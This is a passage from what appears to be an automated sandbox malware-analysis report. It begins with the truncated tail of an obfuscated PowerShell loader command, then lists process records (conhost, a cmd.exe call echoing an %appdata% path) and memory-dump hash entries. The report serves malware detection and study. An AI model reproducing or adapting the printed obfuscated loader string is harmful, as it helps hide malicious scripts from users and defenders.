'Sinec$CuspygLiderlSineboR,ngeb vareaT.gthlAf,it:NegerHFrifiaStikkr En reAndensProagkNonpeaNo.liaswi hr Lobesforpu= r.al$Sk.leWSn.taiXylyltRejs,hAutocn issaUpbanyVi.se.Beechs AnaluFilmubTergesciv.lt Er,ir KrysiScripn DestgA non(Ce lp3Hiv.u0 Hvin1Merri6 Samt8 ues5Praes,,arbo2Baiss8Chifr3Outro0B,nzi4elect) Sani ');cairned $Hareskaars;"
                                  Imagebase:0x7ff6cb6b0000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:11:05:54
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6ee680000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:11:05:56
                                  Start date:18/04/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $"
                                  Imagebase:0x7ff74f760000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Reset < >
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @JK$@JK$@JK$@JK$@JK
                                    • API String ID: 0-2976473624
                                    • Opcode ID: 49df6ddf0fa92cfd3318b468e9e75f8fd9d6ff71da6ce26cc2251d73decac6a6
                                    • Instruction ID: 92819e6e2205e8ce2ea73abc34a9d5138c4d79e7ff7e37aef5b419f197dfcc21
                                    • Opcode Fuzzy Hash: 49df6ddf0fa92cfd3318b468e9e75f8fd9d6ff71da6ce26cc2251d73decac6a6
                                    • Instruction Fuzzy Hash: 52D148A390EBCA9FE796AE78C8549B67BE0FF46310B1441FED54CC70A3DA199C058351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: P,KK
                                    • API String ID: 0-698180076
                                    • Opcode ID: be537beee21c93acc87eb7b33a4c3b1bf6d7873b75519483932fb465a20345cf
                                    • Instruction ID: dfcef594197542b24b9b22084ddb2cb761821dec82feecd0f30417939f94c15c
                                    • Opcode Fuzzy Hash: be537beee21c93acc87eb7b33a4c3b1bf6d7873b75519483932fb465a20345cf
                                    • Instruction Fuzzy Hash: 6A51D39281E7C55FE3939B384C695A63FA4DF53254B0A51FBE1C9CB0E3D8086D4AC362
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 14e3bb82334c7bf21f60c98a987b0b96afa57ffcacc1bfe5382da246996e8a16
                                    • Instruction ID: fec8b3ed54527112b75cff7cb9c01a35898e4795c94336997a45b1ba127e8d5c
                                    • Opcode Fuzzy Hash: 14e3bb82334c7bf21f60c98a987b0b96afa57ffcacc1bfe5382da246996e8a16
                                    • Instruction Fuzzy Hash: FAE146B390DA8A0FE795EFBCC8951BA7BE1EF55220B1841BAD14DC71E3DA18AC058341
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1532085025.00007FFB4B330000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B330000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffb4b330000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 687412d17584089bae7b6da7b4de77d7025432e7e45b1381c66277a187eeea7b
                                    • Instruction ID: 1ba9cea8d70e0ab8fa6658254a39d196908684f1ee045014ca83b7ae1bd27e53
                                    • Opcode Fuzzy Hash: 687412d17584089bae7b6da7b4de77d7025432e7e45b1381c66277a187eeea7b
                                    • Instruction Fuzzy Hash: 035136A391EA8A0FE392FFBDC99017A6AD1AF51260B5850F9E19CC31E3DD1CAC048341
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1531719397.00007FFB4B260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B260000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffb4b260000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: 864077519ff0b0c3641f8ff60c33cf0aeaebd100273d8e65676a99af2e43e9b2
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction Fuzzy Hash: FB01677115CB0C8FD744EF0CE451AA6B7E0FB95364F10056DE58AC3665D636E882CB45
                                    Uniqueness

                                    Uniqueness Score: -1.00%